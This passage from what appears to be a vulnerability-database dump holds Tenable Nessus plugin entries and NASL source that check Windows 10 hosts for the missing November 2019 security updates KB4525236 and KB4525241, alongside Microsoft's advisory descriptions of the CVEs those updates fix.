delete data. (CVE-2019-1388)\n\n - A local elevation of privilege vulnerability exists in\n how splwow64.exe handles certain calls. An attacker who\n successfully exploited the vulnerability could elevate\n privileges on an affected system from low-integrity to\n medium-integrity. This vulnerability by itself does not\n allow arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability (such as a remote\n code execution vulnerability or another elevation of\n privilege vulnerability) that is capable of leveraging\n the elevated privileges when code execution is\n attempted. The security update addresses the\n vulnerability by ensuring splwow64.exe properly handles\n these calls.. (CVE-2019-1380)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2019-1429)\n\n - A security feature bypass vulnerability exists where a\n NETLOGON message is able to obtain the session key and\n sign messages. (CVE-2019-1384)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2019-1407, CVE-2019-1433, CVE-2019-1435,\n CVE-2019-1438)\n\n - An information vulnerability exists when Windows Modules\n Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow\n the attacker to read the contents of a log file on disk.\n (CVE-2019-1418)\n\n - An elevation of privilege vulnerability exists when the\n Windows User Profile Service (ProfSvc) improperly\n handles symlinks. An attacker who successfully exploited\n this vulnerability could delete files and folders in an\n elevated context. (CVE-2019-1454)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Network Switch on a host server fails to\n properly validate input from a privileged user on a\n guest operating system. An attacker who successfully\n exploited the vulnerability could cause the host server\n to crash. (CVE-2019-0712)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-12207,\n CVE-2019-1391)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-1393, CVE-2019-1394,\n CVE-2019-1395, CVE-2019-1396, CVE-2019-1408)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2019-1415)\n\n - An information disclosure vulnerability exists when\n DirectWrite improperly discloses the contents of its\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how DirectWrite handles objects in memory.\n (CVE-2019-1411)\n\n - An information disclosure vulnerability exists when the\n Windows Servicing Stack allows access to unprivileged\n file locations. An attacker who successfully exploited\n the vulnerability could potentially access unauthorized\n files. (CVE-2019-1381)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1390)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1436)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-1439)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1406)\n\n - An elevation of privilege vulnerability exists when the\n Windows Universal Plug and Play (UPnP) service\n improperly allows COM object creation. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2019-1405)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles specially crafted OpenType\n fonts. For all systems except Windows 10, an attacker\n who successfully exploited the vulnerability could\n execute code remotely. For systems running Windows 10,\n an attacker who successfully exploited the vulnerability\n could execute code in an AppContainer sandbox context\n with limited privileges and capabilities. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n There are multiple ways an attacker could exploit the\n vulnerability, such as by either convincing a user to\n open a specially crafted document, or by convincing a\n user to visit a webpage that contains specially crafted\n embedded OpenType fonts. The update addresses the\n vulnerability by correcting how the Windows Adobe Type\n Manager Library handles OpenType fonts. (CVE-2019-1419,\n CVE-2019-1456)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V on a host server fails to properly validate\n input from a privileged user on a guest operating\n system. (CVE-2019-1399)\n\n - An elevation of privilege vulnerability exists when the\n Windows Data Sharing Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Data Sharing Service\n handles file operations. (CVE-2019-1383, CVE-2019-1417)\n\n - An elevation of privilege vulnerability exists when\n ActiveX Installer service may allow access to files\n without proper authentication. An attacker who\n successfully exploited the vulnerability could\n potentially access unauthorized files. (CVE-2019-1382)\n\n - An information disclosure vulnerability exists when the\n Windows Remote Procedure Call (RPC) runtime improperly\n initializes objects in memory. An attacker who\n successfully exploited this vulnerability could obtain\n information to further compromise the users system.\n (CVE-2019-1409)\n\n - An elevation of privilege vulnerability exists in the\n way that the dssvc.dll handles file creation allowing\n for a file overwrite or creation in a secured location.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2019-1420)\n\n - An elevation of privilege vulnerability exists in the\n way that the iphlpsvc.dll handles file creation allowing\n for a file overwrite. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2019-1422)\");\n # https://support.microsoft.com/en-us/help/4525236/windows-10-update-kb4525236\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c647fbe4\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4525236.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1406\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft UPnP Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/11/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-11\";\nkbs = make_list('4525236');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"14393\",\n rollup_date:\"11_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4525236])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-31T20:43:25", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4525241.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A security feature bypass vulnerability exists when\n Windows Netlogon improperly handles a secure\n communications channel. An attacker who successfully\n exploited the vulnerability could downgrade aspects of\n the connection allowing for further modification of the\n transmission. (CVE-2019-1424)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-11135)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2019-1374)\n\n - A local elevation of privilege vulnerability exists in\n how splwow64.exe handles certain calls. An attacker who\n successfully exploited the vulnerability could elevate\n privileges on an affected system from low-integrity to\n medium-integrity. This vulnerability by itself does not\n allow arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability (such as a remote\n code execution vulnerability or another elevation of\n privilege vulnerability) that is capable of leveraging\n the elevated privileges when code execution is\n attempted. The security update addresses the\n vulnerability by ensuring splwow64.exe properly handles\n these calls.. (CVE-2019-1380)\n\n - An elevation of privilege vulnerability exists due to a\n race condition in Windows Subsystem for Linux. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2019-1416)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2019-1429)\n\n - A security feature bypass vulnerability exists where a\n NETLOGON message is able to obtain the session key and\n sign messages. (CVE-2019-1384)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2019-1407, CVE-2019-1433, CVE-2019-1435,\n CVE-2019-1438)\n\n - An information vulnerability exists when Windows Modules\n Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow\n the attacker to read the contents of a log file on disk.\n (CVE-2019-1418)\n\n - An elevation of privilege vulnerability exists when the\n Windows User Profile Service (ProfSvc) improperly\n handles symlinks. An attacker who successfully exploited\n this vulnerability could delete files and folders in an\n elevated context. (CVE-2019-1454)\n\n - An elevation of privilege vulnerability exists in the\n Windows Certificate Dialog when it does not properly\n enforce user privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2019-1388)\n\n - An information disclosure vulnerability exists when the\n Windows TCP/IP stack improperly handles IPv6 flowlabel\n filled in packets. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2019-1324)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Network Switch on a host server fails to\n properly validate input from a privileged user on a\n guest operating system. An attacker who successfully\n exploited the vulnerability could cause the host server\n to crash. (CVE-2019-0712, CVE-2019-1309)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-12207,\n CVE-2019-1391)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-1393, CVE-2019-1394,\n CVE-2019-1395, CVE-2019-1396, CVE-2019-1408)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2019-1415)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V Network Switch on a host server fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2019-0719, CVE-2019-0721)\n\n - An information disclosure vulnerability exists when\n DirectWrite improperly discloses the contents of its\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how DirectWrite handles objects in memory.\n (CVE-2019-1411)\n\n - An information disclosure vulnerability exists when the\n Windows Servicing Stack allows access to unprivileged\n file locations. An attacker who successfully exploited\n the vulnerability could potentially access unauthorized\n files. (CVE-2019-1381)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1390)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-1439)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1406)\n\n - An elevation of privilege vulnerability exists when the\n Windows Universal Plug and Play (UPnP) service\n improperly allows COM object creation. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2019-1405)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2019-1389, CVE-2019-1397,\n CVE-2019-1398)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles specially crafted OpenType\n fonts. For all systems except Windows 10, an attacker\n who successfully exploited the vulnerability could\n execute code remotely. For systems running Windows 10,\n an attacker who successfully exploited the vulnerability\n could execute code in an AppContainer sandbox context\n with limited privileges and capabilities. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n There are multiple ways an attacker could exploit the\n vulnerability, such as by either convincing a user to\n open a specially crafted document, or by convincing a\n user to visit a webpage that contains specially crafted\n embedded OpenType fonts. The update addresses the\n vulnerability by correcting how the Windows Adobe Type\n Manager Library handles OpenType fonts. (CVE-2019-1419,\n CVE-2019-1456)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V on a host server fails to properly validate\n input from a privileged user on a guest operating\n system. (CVE-2019-1399)\n\n - An elevation of privilege vulnerability exists when the\n Windows Data Sharing Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Data Sharing Service\n handles file operations. (CVE-2019-1383, CVE-2019-1417)\n\n - An elevation of privilege vulnerability exists when\n ActiveX Installer service may allow access to files\n without proper authentication. An attacker who\n successfully exploited the vulnerability could\n potentially access unauthorized files. (CVE-2019-1382)\n\n - An information disclosure vulnerability exists when the\n Windows Remote Procedure Call (RPC) runtime improperly\n initializes objects in memory. An attacker who\n successfully exploited this vulnerability could obtain\n information to further compromise the users system.\n (CVE-2019-1409)\n\n - An elevation of privilege vulnerability exists in the\n way that the dssvc.dll handles file creation allowing\n for a file overwrite or creation in a secured location.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2019-1420)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1436, CVE-2019-1440)\n\n - An elevation of privilege vulnerability exists in the\n way that the iphlpsvc.dll handles file creation allowing\n for a file overwrite. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2019-1422)\n\n - An elevation of privilege vulnerability exists when the\n Windows AppX Deployment Extensions improperly performs\n privilege management, resulting in access to system\n files. (CVE-2019-1385)", "modified": "2019-11-12T00:00:00", "id": "SMB_NT_MS19_NOV_4525241.NASL", "href": "https://www.tenable.com/plugins/nessus/130908", "published": "2019-11-12T00:00:00", "title": "KB4525241: Windows 10 Version 1709 November 2019 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(130908);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/27\");\n\n script_cve_id(\n \"CVE-2018-12207\",\n \"CVE-2019-0712\",\n \"CVE-2019-0719\",\n \"CVE-2019-0721\",\n \"CVE-2019-1309\",\n \"CVE-2019-1324\",\n \"CVE-2019-1374\",\n \"CVE-2019-1380\",\n \"CVE-2019-1381\",\n \"CVE-2019-1382\",\n \"CVE-2019-1383\",\n \"CVE-2019-1384\",\n \"CVE-2019-1385\",\n \"CVE-2019-1388\",\n \"CVE-2019-1389\",\n \"CVE-2019-1390\",\n \"CVE-2019-1391\",\n \"CVE-2019-1393\",\n \"CVE-2019-1394\",\n \"CVE-2019-1395\",\n \"CVE-2019-1396\",\n \"CVE-2019-1397\",\n \"CVE-2019-1398\",\n \"CVE-2019-1399\",\n \"CVE-2019-1405\",\n \"CVE-2019-1406\",\n \"CVE-2019-1407\",\n \"CVE-2019-1408\",\n \"CVE-2019-1409\",\n \"CVE-2019-1411\",\n \"CVE-2019-1413\",\n \"CVE-2019-1415\",\n \"CVE-2019-1416\",\n \"CVE-2019-1417\",\n \"CVE-2019-1418\",\n \"CVE-2019-1419\",\n \"CVE-2019-1420\",\n \"CVE-2019-1422\",\n \"CVE-2019-1424\",\n \"CVE-2019-1426\",\n \"CVE-2019-1427\",\n \"CVE-2019-1428\",\n \"CVE-2019-1429\",\n \"CVE-2019-1433\",\n \"CVE-2019-1435\",\n \"CVE-2019-1436\",\n \"CVE-2019-1438\",\n \"CVE-2019-1439\",\n \"CVE-2019-1440\",\n \"CVE-2019-1454\",\n \"CVE-2019-1456\",\n \"CVE-2019-11135\"\n );\n script_xref(name:\"MSKB\", value:\"4525241\");\n script_xref(name:\"MSFT\", value:\"MS19-4525241\");\n\n script_name(english:\"KB4525241: Windows 10 Version 1709 November 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4525241.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A security feature bypass vulnerability exists when\n Windows Netlogon improperly handles a secure\n communications channel. An attacker who successfully\n exploited the vulnerability could downgrade aspects of\n the connection allowing for further modification of the\n transmission. (CVE-2019-1424)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-11135)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2019-1374)\n\n - A local elevation of privilege vulnerability exists in\n how splwow64.exe handles certain calls. An attacker who\n successfully exploited the vulnerability could elevate\n privileges on an affected system from low-integrity to\n medium-integrity. This vulnerability by itself does not\n allow arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability (such as a remote\n code execution vulnerability or another elevation of\n privilege vulnerability) that is capable of leveraging\n the elevated privileges when code execution is\n attempted. The security update addresses the\n vulnerability by ensuring splwow64.exe properly handles\n these calls.. (CVE-2019-1380)\n\n - An elevation of privilege vulnerability exists due to a\n race condition in Windows Subsystem for Linux. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2019-1416)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2019-1429)\n\n - A security feature bypass vulnerability exists where a\n NETLOGON message is able to obtain the session key and\n sign messages. (CVE-2019-1384)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2019-1407, CVE-2019-1433, CVE-2019-1435,\n CVE-2019-1438)\n\n - An information vulnerability exists when Windows Modules\n Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow\n the attacker to read the contents of a log file on disk.\n (CVE-2019-1418)\n\n - An elevation of privilege vulnerability exists when the\n Windows User Profile Service (ProfSvc) improperly\n handles symlinks. An attacker who successfully exploited\n this vulnerability could delete files and folders in an\n elevated context. (CVE-2019-1454)\n\n - An elevation of privilege vulnerability exists in the\n Windows Certificate Dialog when it does not properly\n enforce user privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2019-1388)\n\n - An information disclosure vulnerability exists when the\n Windows TCP/IP stack improperly handles IPv6 flowlabel\n filled in packets. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2019-1324)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Network Switch on a host server fails to\n properly validate input from a privileged user on a\n guest operating system. An attacker who successfully\n exploited the vulnerability could cause the host server\n to crash. (CVE-2019-0712, CVE-2019-1309)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-12207,\n CVE-2019-1391)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-1393, CVE-2019-1394,\n CVE-2019-1395, CVE-2019-1396, CVE-2019-1408)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2019-1415)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V Network Switch on a host server fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2019-0719, CVE-2019-0721)\n\n - An information disclosure vulnerability exists when\n DirectWrite improperly discloses the contents of its\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how DirectWrite handles objects in memory.\n (CVE-2019-1411)\n\n - An information disclosure vulnerability exists when the\n Windows Servicing Stack allows access to unprivileged\n file locations. An attacker who successfully exploited\n the vulnerability could potentially access unauthorized\n files. (CVE-2019-1381)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1390)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-1439)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1406)\n\n - An elevation of privilege vulnerability exists when the\n Windows Universal Plug and Play (UPnP) service\n improperly allows COM object creation. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2019-1405)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2019-1389, CVE-2019-1397,\n CVE-2019-1398)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles specially crafted OpenType\n fonts. For all systems except Windows 10, an attacker\n who successfully exploited the vulnerability could\n execute code remotely. For systems running Windows 10,\n an attacker who successfully exploited the vulnerability\n could execute code in an AppContainer sandbox context\n with limited privileges and capabilities. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n There are multiple ways an attacker could exploit the\n vulnerability, such as by either convincing a user to\n open a specially crafted document, or by convincing a\n user to visit a webpage that contains specially crafted\n embedded OpenType fonts. The update addresses the\n vulnerability by correcting how the Windows Adobe Type\n Manager Library handles OpenType fonts. (CVE-2019-1419,\n CVE-2019-1456)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V on a host server fails to properly validate\n input from a privileged user on a guest operating\n system. (CVE-2019-1399)\n\n - An elevation of privilege vulnerability exists when the\n Windows Data Sharing Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Data Sharing Service\n handles file operations. (CVE-2019-1383, CVE-2019-1417)\n\n - An elevation of privilege vulnerability exists when\n ActiveX Installer service may allow access to files\n without proper authentication. An attacker who\n successfully exploited the vulnerability could\n potentially access unauthorized files. (CVE-2019-1382)\n\n - An information disclosure vulnerability exists when the\n Windows Remote Procedure Call (RPC) runtime improperly\n initializes objects in memory. An attacker who\n successfully exploited this vulnerability could obtain\n information to further compromise the users system.\n (CVE-2019-1409)\n\n - An elevation of privilege vulnerability exists in the\n way that the dssvc.dll handles file creation allowing\n for a file overwrite or creation in a secured location.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2019-1420)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1436, CVE-2019-1440)\n\n - An elevation of privilege vulnerability exists in the\n way that the iphlpsvc.dll handles file creation allowing\n for a file overwrite. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2019-1422)\n\n - An elevation of privilege vulnerability exists when the\n Windows AppX Deployment Extensions improperly performs\n privilege management, resulting in access to system\n files. (CVE-2019-1385)\");\n # https://support.microsoft.com/en-us/help/4525241/windows-10-update-kb4525241\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?df32672c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4525241.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1406\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft UPnP Local Privilege Elevation Vulnerability');\n 